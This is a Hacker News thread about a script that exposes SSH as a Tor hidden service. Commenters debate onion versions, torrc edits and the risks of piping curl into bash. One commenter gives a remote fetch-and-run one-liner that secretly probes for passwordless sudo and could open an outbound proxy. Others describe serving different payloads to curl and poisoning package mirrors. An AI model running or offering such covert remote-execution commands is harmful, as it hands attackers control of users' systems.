Show HN: tor_ssh.sh – One command to enable SSH access via Tor (gitlab.com)
93 points by NickBusey 20 days ago | 65 comments

Shameless plug: this script I wrote a while ago automates setting up a Tor hidden SSH service that isn't vulnerable to SSH host key enumeration. I'd like to improve it, but I'm not sure which audience I should target. If you could review or try it out and have any feedback, a GitHub issue or a comment here would be much appreciated.


This works pretty well, especially if you have personal computers behind different NATs. One remaining issue is that you have to distribute the onion domain name all over the place. You also need to keep the keys safe if you want to keep that domain name.

These two parts I found the more annoying to deal with, although the same is true for most VPN solutions (think tinc, WireGuard).

> One remaining issue is that you have to distribute the onion domain name all over the place.

I don't understand why you couldn't have a small utility that takes a human-memorable password mapping to a weak-ass private key, then ratchets up to a secure keypair on the server once the initial connection is made:

1. Run utility in "server" mode.

2. Enter password "I am not the target of a state level actor atm" into utility

3. Utility maps your weak-ass password to a weak-ass private key, generates the pubkey from that, and consequently creates the Tor hidden service behind which your openssh server can now be accessed.

4. On the client, run the utility in "client" mode and type in your weak-ass password

5. Utility maps the password to the server's weak-ass keypair and generates the corresponding onion address from it.

6. Utility creates a tunnel over Tor to connect to that onion address.

7. Server and client are now connected, with no memorization of human unreadable strings. Hurray!

8. Once connected, the server generates a secure keypair and sends the corresponding new onion addy to the client over the current connection.

9. Client receives the new onion addy, disconnects, then connects to the new addy.

10. Repeat for each client. Once all clients are connected, server destroys the original hidden service.
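A minimal sketch of the password-to-seed mapping in steps 3 and 5, assuming only `sha256sum` is available. `derive_seed` and the salt string are hypothetical; a real tool would use a memory-hard KDF (argon2/scrypt) with a much higher work factor and feed the 32-byte seed into ed25519 key generation for the onion service:

```shell
# Sketch: client and server derive the same 32-byte seed from the
# password alone. Iterated SHA-256 is for illustration only; a real
# tool would use argon2/scrypt and a far higher work factor.
derive_seed() {
  local pw=$1 salt='tor-ssh-bootstrap' h i
  h=$(printf '%s' "$pw:$salt" | sha256sum | awk '{print $1}')
  for i in $(seq 1 100); do   # illustrative stretching loop
    h=$(printf '%s' "$h" | sha256sum | awk '{print $1}')
  done
  printf '%s\n' "$h"
}
```

The server would turn the seed into the (deliberately weak) hidden service key; the client repeats the same derivation to compute the matching onion address, so nothing beyond the password has to be shared in advance.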

I highly recommend ZeroTier for maintaining stable connectivity and static private IPs regardless of NAT or networking environment peculiarities. It also supports multipath bonding of interfaces, like SD-WAN (in an alpha branch).

We use it to connect to touring production racks using a consistent IP regardless of what concert venue ISP they might be connected to on a given day.

NAT traversal is a useful and underrated Tor hidden service use case.

Careful though: installing the version of Tor included in Ubuntu's repositories is not recommended, as it is often very out of date.

Use the Tor project’s PPA instead.
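For what it's worth, a sketch of the apt source entry the Tor Project documented at the time (the release codename `bionic` is just an example for Ubuntu 18.04; check the official docs for the current entry and archive signing key):

```
# /etc/apt/sources.list.d/tor.list
deb https://deb.torproject.org/torproject.org bionic main
deb-src https://deb.torproject.org/torproject.org bionic main
```

After importing the archive signing key, `apt update && apt install tor deb.torproject.org-keyring` keeps you on the project's current release.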

Exactly this.

Many times people have assumed that Tor is only for the 'dark web' and other things with no legitimate business use.

But as you say, escaping NAT is a perfect use-case. It's particularly good for escaping CGNAT, as to be honest there aren't many other ways to escape CGNAT and still have a 'listening' server, rather than just an always-open tunnel.

Edit: The Tor Project website has a useful section on how IT professionals use Tor, which covers some more interesting ones: https://www.torproject.org/about/torusers.html.en#itprofessi...

This is also valuable for debugging CI builds, and coupled with an SSH key it can be more secure than the debug mode CI services provide. For example, on Travis CI the debug host is displayed in the logs, and anyone can access it through ssh.


This line was puzzling:

    # Remove the bogus tor service Ubuntu installs by default
Is there a bug in the upstream package or something? Otherwise this just looks like a big step back from systemd to SysV — without automatic restarts the first time the daemon exits, you're locked out of the server.

Typically I'd put that into a comment right above that line. I'd also really be inclined to install a replacement service instead so you'd get automatic restarts if you aren't very confident that you have another way into the box.

Yea, I agree. I actually was thinking before I posted this "Someone will ask about that line, I should just add the link to the comments" haha. (Just added it.)

If you read the discussion in the link, this actually does do that. It just replaces the 'empty' service with the actual tor service. So you do get automatic restarts.

  # Append the hidden service configuration to the Torrc file
  echo -e "HiddenServiceDir /var/lib/tor/onion-ssh/\nHiddenServicePort 22" > /etc/tor/torrc
Unless the '>' is changed to ">>", this will overwrite the torrc file.

The default ubuntu torrc has everything commented out so is effectively blank anyway.

Using ">" instead of ">>" means you don't end up with multiple copies of the same hidden service.

That said, I agree: it should append, but it should first check whether it has already added a hidden service to the file.

Exactly, for simplicity since nothing is in there by default, it gets overwritten. To keep the script nice and short I decided not to add that detection. I would happily merge the change if someone decides they care enough to add it.

Maybe something like

  if [ $(grep "HiddenServicePort 22" /etc/tor/torrc | wc -l) -eq 0 ]

Or the more idiomatic:

  if grep -q "HiddenServiceDir /var/lib/tor/onion-ssh/" /etc/tor/torrc

I wish bash had a ternary operator for extra IOCCC-compliance.
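Putting the check and the append together, a hedged sketch of an idempotent version (the file path is a parameter purely so the function can be exercised against a scratch file instead of the real /etc/tor/torrc):

```shell
# Idempotent torrc append: only add the hidden service stanza if it
# is not already present, so re-running the script is harmless.
add_hidden_service() {
  local torrc=${1:-/etc/tor/torrc}
  if ! grep -q '^HiddenServiceDir /var/lib/tor/onion-ssh/' "$torrc" 2>/dev/null; then
    printf 'HiddenServiceDir /var/lib/tor/onion-ssh/\nHiddenServicePort 22\n' >> "$torrc"
  fi
}
```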

I actually presented on something close to this a couple of months ago to the local LUG. I made a raspberry pi tor jump server that would allow you to ssh over tor into your home network to bust through the NAT. My slide deck is https://content.evernote.com/shard/s84/sh/00920ea8-78a7-4b1a...

tor_ssh.sh – One command to enable SSH access via Tor to some servers: Debian is not the entirety of Linux

How come you aren't using `HiddenServiceVersion 3`?

Onion v2 (16 char addresses) uses old crypto (SHA1/DH/RSA1024) and has now been superseded by Onion v3 (56 char addresses, SHA3/ed25519/curve25519 and many other improvements).
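For reference, a v3 stanza in torrc needs only one extra line (the explicit `127.0.0.1:22` target is optional; without it the virtual port maps to the same port on localhost):

```
HiddenServiceDir /var/lib/tor/onion-ssh/
HiddenServiceVersion 3
HiddenServicePort 22 127.0.0.1:22
```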


Will ssh experience the timeouts and connection aborts detailed here (http://sites.inka.de/bigred/devel/tcp-tcp.html), or is that not applicable?

Nice script BTW.

There's also torsocks or even tsocks if you need something more battle tested.

EDIT: I stand corrected, see @buildbuildbuild reply.

That does the reverse: allows you to connect to public IP addresses through Tor. This solution exposes your local SSH server as a static hidden service without needing to forward ports in a NATed environment.
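On the client side, instead of wrapping every command in torsocks, an `ssh_config` stanza can route just `.onion` hosts through Tor's SOCKS proxy (this assumes Tor's default SOCKS port 9050 and OpenBSD netcat, whose `-X 5 -x` flags select a SOCKS5 proxy):

```
# ~/.ssh/config
Host *.onion
    ProxyCommand nc -X 5 -x 127.0.0.1:9050 %h %p
```

With that in place, `ssh user@youraddress.onion` just works, and only onion traffic goes through Tor.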

Posted on HN 6 days ago by the same user (zero comments received).


"any server" running ubuntu...

I like the theory behind this and the motivation. But this has to stop:

># Usage (as root): $ bash <(curl -s https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh)

Spoon-feeding like this is why Windows has such a disgusting history of malware, and it only encourages people not to think about what they are doing.

It's better to tell people 'clone this repo and run this script'? I'm pretty sure people have exactly the same chance of auditing it.

curl | sh is slightly problematic from untrusted servers that might change the script depending on whether or not it's piped to a shell, but from gitlab I just don't see a difference.

Of course it's better, because we can link to a specific commit by its hash, which is way more secure.

You can do that with a direct link too: bash <(curl -s https://gitlab.com/grownetics/devops/raw/ef053050065c4928714...)

No, you can't. Nothing will check the SHA-256 of malware downloaded in this way, so nothing will stop that malware from owning your host. To check, just put "<your server's IP> gitlab.com" into your /etc/hosts and try to serve your own file from that URL. Git will detect this; curl will not.

Yes, try it. Unless something has changed drastically curl still checks that certificates are valid.

It looks like you assume that SSL guarantees correctness of the file.

First, I have had experience with substituted SSL certificates (by our government, during a revolution), when errors were reported only by Chrome, thanks to certificate pinning for Google services.

Second, the site can be hacked and the file replaced directly on the site.

When your threat level is government agencies then, sure, you have issues. But git wouldn't solve anything, unless you have a way to verify the hash or signature.

Can you name even a single instance of this ever distributing malware in history? If downloading an anonymous binary makes you feel safer then I think your criticism lacks merit.

I wish curl (or a similar tool shipped by default on all distros) had a flag that accepts a hash and verifies that the downloaded file matches that hash before streaming it out.
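A sketch of what such a wrapper could look like (`fetch_verified` is a hypothetical name, and the usual caveat applies: you still need a trusted channel for the expected hash itself):

```shell
# Sketch of the wished-for "curl --verify-hash": download to a temp
# file, check the sha256, and only then emit the contents.
fetch_verified() {
  local url=$1 expected=$2 tmp actual
  tmp=$(mktemp) || return 1
  curl -fsSL "$url" -o "$tmp" || { rm -f "$tmp"; return 1; }
  actual=$(sha256sum "$tmp" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    echo "hash mismatch: expected $expected, got $actual" >&2
    rm -f "$tmp"
    return 1
  fi
  cat "$tmp"
  rm -f "$tmp"
}
# usage: fetch_verified https://example.com/install.sh <sha256> | bash
```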

I played around with that idea in https://github.com/mkmik/runck but it obviously can be used for installation instructions only if it's rather ubiquitous.

Integrity of the file after transfer isn't the problem.

One possible curl/bash attack is to serve a safe file to browsers but a malicious one to curl. In that case a step where you verify the integrity of the file curl downloads would be useful.

(I seem to recall there being a way for the server to reliably guess whether the file was being piped or saved to disc, as well, which would let you restrict the malicious version even more. Google is failing me at the moment, though.)

This post demonstrates detecting the difference between a user piping the output from curl to bash versus curl to stdout.


What specific threat do you believe your advice is protecting people against?

sudo -n is a start.

Here is one I wrote that shows your internet speed, but will also check to see if you have passwordless sudo. Even without sudo, I could spawn and persist a gateway port ssh proxy outbound to a VPS node, but with sudo, I could do much more.

    curl -A Mozilla -s https://tinyvpn.org/misc/url_test.txt | bash

… and you've installed this on Gitlab's servers? If not, the knowledge that people write malicious code is not new but the problem isn't running it using curl but not vetting the source and code before you run it. Focusing on the use of curl distracts attention from the part which matters.

I understand what you are saying, but respectfully disagree.

Conditioning people to use `curl | bash` trains them not to review anything and to blindly run untrusted code. I have proven this across a very large group of people, including many who are supposed to be security minded. This technique works on nearly all organizations, as most companies and government agencies do not force outbound traffic through a MITM proxy. I have mixed feelings about those devices.

For what it's worth, where the code is running from doesn't really matter. The only advantage to pulling something from GitLab or GitHub is that I have to commit changes that anyone could see, assuming I don't recreate the repo, which I can automate via their API. From any of my own VMs or servers, I can certainly make something look like a .txt that isn't, and dynamically change it based on user-agent, remote addr, latency, TTL, etc. I could even change the response if someone used curl with a fake user-agent, based on timing, but that is another blog post for another day.

Fair enough, but I would ask whether this is really that much worse than, say, running "npm install" or "pip install" for a package whose author you don't implicitly trust. From my perspective, that time would be better spent educating developers and working to make their tools safer to use. For example, using aws-vault on a Mac means that a drive-by script cannot harvest your AWS credentials (the keychain prompts per binary and the user cannot bypass it).

Tools like pip, pear, gem, etc. are quite bad as well. Unless they validate GPG signatures of files or packages against a trusted source, you could easily be installing a package from a mirror that has been compromised. In fact, this has happened to Python repositories several times.

Even GPG checks, done the way Ubuntu and Red Hat do them, can be bad. I see people install the GPG keys from the mirror all the time. If I pop the mirror, I can simply put my own GPG keys in it, and a percentage of people will happily install them.

GPG adds usability problems and doesn’t much help in the case where people have no idea whether the remote author they’ve never met is trustworthy. In most cases something like a Linux distribution is what you want where things are at least highly visible and a trusted third-party is looking at the update history.

Modern package managers do at least store hashes so your NPM, Python, Rust, etc. packages can depend on other packages with hashes in addition to just a version, which at least forces them to attempt to make the exploit covert enough that it can be deployed to everyone but there are many ways to make something subtly vulnerable. Ultimately, I really think this is coming back to securing the environment so a successful attack gets less. Apple has led the way on protecting things like passwords and mail from other processes running as the same user but it’d be really interesting to see how far you could get running your entire toolchain using the OS’ sandboxing.

Here is a thread discussing the detection of `curl | bash` based on script timing [1]

[1] - https://news.ycombinator.com/item?id=17636032


Think about this more: what malware are you going to get by running that command that you wouldn't get by downloading the file and running it locally?

You'll eventually realize that the answer is that this advice has no value. What could potentially have value is reviewing the code before running it, which can be done either way.

There is still one difference: by downloading it locally, you only have to check it once, not every time you want to use the script. You definitely have to trust more parties by piping from the web, and these parties could be compromised at some point. This might be fine; it depends on your own security policy.

Of course, I can get malware in both ways, so the recommended way is to trust a third party, a maintainer, who reviews the code and then creates a signed package.

Right, so rather than talking about curl | bash it would really be better to talk about your review process since, for example, the same concerns apply if you do something like "npm install" without vetting every dependency.

Better usage would be:

- wget https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh

- less tor_ssh.sh

- sudo bash tor_ssh.sh

You are making a script to access a server through Tor, I think "paranoid" users might be most of your users.

The purpose is easy NAT traversal for things like onsite physical servers or CI testing.

Tor is not reserved for nefarious purposes.

I recently saw the term “curlbashware”, and I like it.

The curl command is only found in the script itself, when you look at the source on GitLab. Also, the script contains seven lines in total if you remove the comments.

I get what you're trying to say but in that specific case I don't think it really applies.

I mean, that command is linked to in the actual script itself. I figure if you're already reading it, it's probably pretty safe to run. It's also what, a seven line script? Not too many places to hide anything nefarious in there.

Sure, I suppose the install directions should be more like, wget the file, cat it to be sure gitlab didn't serve you a malicious file instead(?), then run it.

Really not sure what this has to do with malware on Windows though.


This comment breaks the Show HN guidelines badly: https://news.ycombinator.com/showhn.html. It also breaks the site guidelines: https://news.ycombinator.com/newsguidelines.html.

When someone is sharing their work, being a jerk is exactly the wrong approach here. Please don't do it again.

Rather, if you know more, share some of what you know in a way that's going to help them learn, rather than humiliate. As a side bonus, you won't be acidifying this community either, which is fragile and needs all of us to protect it.

You're being downvoted, but I agree with the sentiment. The script is Debian-specific (requires apt) and all it basically does is run `/etc/init.d/tor restart` after installing something from the repositories. Not much of anything going on here.

Thank you. If my comment is downvoted for being a hater, then fine; if I described true facts, then I'll proudly do it again and again. I smile at that bash script :) truly something anyone should bookmark and use daily :))) heh

1. Even if you know how to edit torrc files, I still don't think this is true.

2. Go ahead, nothing will break.

3. True, I have added a note to the script.

4. Umm, is explaining all those slashes simpler than just running a one line command? No. Only 7 lines are even functional, the rest are comments explaining things.

5. If "This file is meant to get SSH access via Tor to an Ubuntu server in one command." doesn't cover for you what it does and why, then you are not the target audience.

Yes, it is a gist for one person. I made it for myself. I thought others would find it useful. I guess that makes me a script kiddie.

Sometimes it is easier to just show someone an idea in a straightforward way rather than spend a whole lot of text describing it.

Using SSH over Tor is a supremely dumb idea unless you really need to hide your SSH sessions and you're already using other methods (pre-shared host fingerprint, single-use SSH key) to secure your session.

1) Tor exit node operators will do all kinds of nasty things: e.g. MITM-ing your sessions, refusing to handle certain kinds of traffic, and recording everything.

2) If you use your regular SSH key (which you will, because you needed to use this script to do this), your SSH key fingerprint and thus your identity is still recorded by the remote host. Doh!

3) Everyone at the remote host will think you got haxed. Because you're logging in through Tor. Or else they'll think you're super shady.

That said, Tor is super fun to play around with. Just don't assume anything gives you real protection unless you're careful and really know the ins and outs.

1.) This doesn't go via an exit node, so this point is invalid.

2.) Why is this a problem? You already own the remote host, so you already know your identity.

3.) It will appear to the remote host as a login from the loopback device. And if you set this up you presumably own the remote host anyway so you don't care what its owner thinks.
